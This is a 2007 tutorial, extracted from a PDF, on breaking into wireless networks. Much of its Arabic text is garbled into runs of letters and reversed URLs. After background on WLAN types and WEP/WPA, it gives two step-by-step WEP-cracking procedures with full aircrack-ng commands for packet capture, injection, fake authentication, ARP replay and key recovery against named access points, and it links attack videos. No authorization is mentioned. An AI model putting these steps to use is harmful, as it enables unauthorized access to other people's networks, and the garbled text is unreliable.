howto-hacking wireless networks اختراق الشبكات اللاسلكية ,, الوايرلس

8/14/2019 HOWTO-Hacking Wireless Networks ,,

1/33


2/33

http://www.t0010.com

2

ProXy-BrokeN####################### Br0ken r0x######################

# Lesson : Howto Hacking Wireless Networks step by step ##Author: BrokeN-ProXy ## Page: www.3asfh.net &www.sniper-sa.com ## Contact Me 0nly email: [email protected] ##Msn Messenger : [email protected] ######################## r0x just do it ############### #####

HackingWireless Networks

Copyright #~ BrokeN-ProXy #~ 2007


3/33


3

http://www.3asfh.net/vb/

http://www.sniper-sa.com/forums/

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

T0010.COM

#### php.index/books/com.0010t.www://http

--------------------------------------------------------------

aLT3rEQ$Hacker---------------------------------------------------------------

W

: Adobe Reader

:

html.2readstep/acrobat/products/uk/com.adobe.www://http


4/33


4

WWWW

WARNINGKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

FWLANE

KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKWired Equivalent PrivacyWi-Fi Protected Access

KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

aircrack-ngKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

wireless toolsKKKKKKKKKKKKKKKKKKK KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK[ Monitor Mode]KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 1KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

The attack method 2KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK


5/33


5

KK Hacking

FFKK

EE

W WWirelessK

WK WK

K

K

KKKKKWARNING


6/33


6

FFFFWLANEEEEWWWW

K

FWLAN \wireless localarea networkEFradiofrequency/RFEK

K

W


7/33


7

JJJJFFFFwireless computer cardsEEEE

K

WWWW

W

PCMCIA

USB


8/33


8

JFaccess pointEW

K

.


9/33


9

W

Institute of Electrical and Electronics Engineers (IEEE)

Internet Engineering Task Force (IETF)

Wireless Ethernet Compatibility Alliance (WECA)

International Telecommunication Union (ITU)

IEEEFE

K

IEEE-

.


10/33


10

.

K)WWAN(W

WWANK

K

WWANF2GEGlobalSystem for Mobile Communications (GSM)Cellular Digital Packet

Data (CDPD)Code Division Multiple Access (CDMA).

KITU.

K)WMAN(Wireless metropolitan area networksW

WMANFE

K

WMANK


11/33


11

WMANK

multichannel multipoint distribution service(MMDS)local multipoint distribution services (LMDS)

IEEE 802.16.

K)WLAN(W

WLANFKE

WLANLAN

K

WLANKWLANFE

KWLANK

.

1997IEEE{WLANKb{

{K

a{.


12/33


12

K)WPAN(Wireless personal area networksW

WPANFPDA

E(POS)POSK

WPANBluetoothKBluetoothK

BluetoothBluetooth

Bluetooth Special Interest Group (SIG)

Bluetooth{KFE.

WPANIEEE{ WPANWPANBluetooth1.0.

{.

WWWWWWWWTeT_TaTWWWW

WLAN=highlight&27438=t?php.threadshow/forum/net.arabhardware.www://http

KKKK


13/33


13

WEP , WPA KK

JWired Equivalent PrivacyW

IEEE

FWired Equivalent PrivacyEWEPK

WEPRC4

64 bitbitK

[Initialization Vector ]IVIVbitRC4 OR 128IVIVK

bitbit

K

RC4IV

RC4IVWEP headerWEPWPAWEPK


14/33


14

JFi Protected Access-WiW

WEP

WPAWi-Fi Protected AccessW

WPA with RADIUS

K

WPA with PSK [pre shared key]

HexadecimalK

TKIPTemporal Key Integrity ProtocolKWEPIVK

Message Integrity CodeARP

Replay AttackWEPIV

IVIV

K

WPADeauthentication Attack

brute force attack

K


15/33


15

KK KAircrack ToolsKAircrack-ng Tools

AircrackK

NETGEAR Or LinksysK

[Chipset]

KAtheros

org.ng-aircrack.www

The best chipset nowadays is Atheros. It is very well supported underLinux, and also under Windows (PCMCIA/CardBus only). Neithersupport any USB wireless devices. The latest madwifi-ng patch makes

it possible to inject raw 802.11 packets in either in Managed andMonitor mode at arbitrary b/g speeds.

aircrack tools

aircrack-ngtools


16/33


16

][chipsetairodumpaireplayK

ChipsetSupported byairodump for

Windows

Supported byairodump for Linux

Supported by aireplayfor Linux

AtherosCardBus: YESPCI: NO (seeCommView)

YESYES (driver patchingrequired)

Atmel UNTESTED802.11b YES802.11g UNTESTED

UNTESTED

BroadcomOld models only(BRCM driver)

YESIN PROGRESS (Forumthread)

Centrino b NOPARTIAL(ipw2100 driverdoesnt discardcorrupted packets)

NO

Centrino b/g NO YESNO (firmware dropsmost packets)ipw2200inject

Centrino a/b/g NO YESNO (See this threadfor alpha injectionsupport.)

Cisco Aironet YES? YES NO (firmware issue)

Hermes I YES YESNO (firmware corrupts

the MAC header)NdisWrapper N/A Never Never

Prism2/3 NO YESYES (PCI and CardBusonly, driver patchingrequired)

PrismGT YESFullMAC: YESSoftMAC: NOT YET

YES (driver patchingrecommended)

Ralink NOYES (rt2500 / rt2570 /rt61 / rt73 driver)

YES, see rt2500,rt2570, rt61 and rt73.Also see Ralinkchipset commentslater on this pager for

important concerns

RTL8180 YES YESUNSTABLE (driverpatching required)

RTL8187L UNTESTEDYES (driver patchingrequired to viewpower levels)

YES (driver patchingrecommended forinjection and requiredto view power levels)

TI(ACX100/ACX111)

NO YESYES (driver patchingrequired)

ZyDAS 1201 NO YESPartially (See patchfor details)

ZyDAS 1211[B] NO YES YESOthers (Marvel...) NO UNKNOWN NO


17/33


17

L

kernel headersgcc

Debian

Ubuntu , Xubuntu , Knoppix ][W

sudo apt-get install build-essential

KKW

wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gztar -zxvf aircrack-ng-0.9.1.tar.gzcd aircrack-ng-0.9.1makemake install

Aircrack

KKK


18/33


18

wget

wget http://pcmcia-cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz

tar

tar xvfz wireless_tools.28.tar.gz

cd

cd wireless_tools.28

make

make

make install

make install

iwconfigiwlistFKE

wireless tools


19/33


19

iwlistFwireless toolsE

K

scan all network around

bt ~ # iwlist ath0 scanath0 Scan completed :

Cell 01 - Address: 00:14:7F:1F:27:6DESSID:"SpeedTouch433793"

Mode:Master

Frequency:2.462 GHz (Channel 11)Quality=60/94 Signal level=-35 dBm Noise level=-95 dBmEncryption key:onBit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s

24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s

12 Mb/s; 48 Mb/sExtra:bcn_int=100

Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322

f00 Cell 02 - Address: 00:18:39:24:5C:F8ESSID:"linksys"Mode:MasterFrequency:2.427 GHz (Channel 4)Quality=50/94 Signal level=-45 dBm Noise level=-95 dBmEncryption key:off

Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s48 Mb/s; 54 Mb/s

Extra:bcn_int=100

Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00


20/33


20

AircrackMonitorK

sniffingMonitor modeManaged

Monitor ModeW

Wcommand lineKWairmon-ngAircrack

ManagedK

bt~ #iwconfig ath0ath0 IEEE 802.11b ESSID:"" Nickname:""

Mode:Managed Channel:0 Access Point: Not-AssociatedBit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3Retry:off RTS thr:off Fragment thr:off

Encryption key:offPower Management:offLink Quality=0/94 Signal level=-98 dBm Noise level=-98 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Monitor ModeW

command line

bt~ #ifconfig ath0 downbt~ #wlanconfig ath0 destroybt ~ #wlanconfig ath0 create wlandev wifi0 wlanmode monitorath0bt~ #ifconfig ath0 upbt ~ #iwconfig ath0

ath0 IEEE 802.11b ESSID:"" Nickname:""Mode:Monitor Frequency:2.412 GHz Access Point: 00:0F:B5:EA:2F:AF

[ Monitor Mode ]


21/33


21

Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3Retry:off RTS thr:off Fragment thr:offEncryption key:off

Power Management:offLink Quality=0/94 Signal level=-98 dBm Noise level=-98 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Wairmon-ngAircrack

bt ~ # airmon-ng stop ath0Interface Chipset Driver

wifi0 Atheros madwifi-ngeth0 Centrino b/g ipw2200ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

bt ~ # airmon-ng start wifi0

Interface Chipset Driver

wifi0 Atheros madwifi-ngeth0 Centrino b/g ipw2200ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor modeenabled)bt ~ # iwconfig ath0ath0 IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.457 GHz Access Point: Not-AssociatedBit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-94 dBm Noise level=-94 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

WWWWWWWW


22/33


22

MonitorK

interactiveK

W

KKarp

requestivs64 bit{

128 bit{K

The attack method 1


23/33


23

airodump-ng capture packetsaireplay-ng -interactive attack modes [ injection packets]aircrack-ng crack WEP , WPA

airodump-ng)(

airodump-ng c 11 -bssid 00:14:7F:1F:27:6D w capture ath0

-c : channel number --bssid : MAC Address for Access Point -w : save the file capture : file name that be save the packet ath0 : our interface name


24/33


24

Interactiveaireplay-ng)(

interactive

aireplay-ng --interactive b 00:14:7F:1F:27:6D d FF:FF:FF:FF:FF:FF m 68 n68 p 0841 h 00:13:CE:6D:61:59 ath0

--interactive : attack modes -b : MAC Address for Access Point -d : Destination MAC Broadcast -m 68 : minimum Packet length -n 68 : maximum Packet length -p 0841 : Sets the frame control -h : MAC Address for Client ath0 : our interface name


25/33


25

(3) increase the packets

FEFEK

aircrack-ng)4(

aircrack-ng b 00:14:7F:1F:27:6D capture.cap

-b : MAC Address for Access Point capture.cap : capture files


26/33


26

Fake authentication

W

K

FEarp requestarp replay

K

The attack method 2


27/33


27

airmon-ng switch to monitor modeairodump-ng capture packetsaireplay-ng attack modes fake authentication

aireplay-ng attack modes arpreplayaircrack-ng crack WEP , WPA

airodump-ng)(

airodump-ng c 6 -bssid 00:14:6C:1A:98:8C w output ath0

-c : channel number --bssid : MAC Address for Access Point -w : save the file output : file name that be save the packet ath0 : our interface name


28/33


28

fake authenticationaireplay-ng)(

K

aireplay-ng --fakeauth 6000 o 1 q 10 e DataCenter a00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0

--fakeauth : attack modes -o 1 : Send only one set of packets at time -q 10 :Send keep alive packets every 10 seconds -e : Name of Access Point -a : MAC Address for Access Point -h : our MAC Address Card ath0 : our interface name


29/33


29

(3) aireplay-ng arpreplay

arp requestK

aireplay-ng --arpreplay b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0

--arpreplay : attack modes -b : MAC Address for Access Point -h : our MAC Address Card ath0 : our interface card


30/33


30

(3) increase the packets

FEFEK


31/33


31

aircrack-ng)4(

aircrack-ng b 00:14:6C:1A:98:8C output.cap

-b : MAC Address for Access Point output.cap : capture files

KKKK


32/33


32

K

WAttack-method 1 ( 124 MB )http://www.4shared.com/file/24526019/8831b5f1/attack-

method1part1.html?dirPwdVerified=630ebe35 50MB

http://www.4shared.com/file/24546586/40c72462/attack-method1part2.html?dirPwdVerified=630ebe35 50MB

http://www.4shared.com/file/24548769/ada0b720/attack-method1part3.html?dirPwdVerified=630ebe35 24MB

Attack-method 2 ( 113 MB )

http://www.4shared.com/file/24553904/65b4efa0/attack-method2part1.html?dirPwdVerified=24884433 50MB

http://www.4shared.com/file/24590482/9b931121/attack-method2part2.html?dirPwdVerified=24884433 50MB

http://www.4shared.com/file/24592271/2b86e86d/attack-method2part3.html?dirPwdVerified=24884433 13MB

KKK

""

KKKKK


33/33


:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

L

)Sptember 23, 2007(

- --------- --- ---- --- ---- ---- ---

----------------------------------------------------------------

aLT3rEQ$Hacker------------------------------------------------------------------

howto-hacking wireless networks اختراق الشبكات اللاسلكية ,, الوايرلس

Documents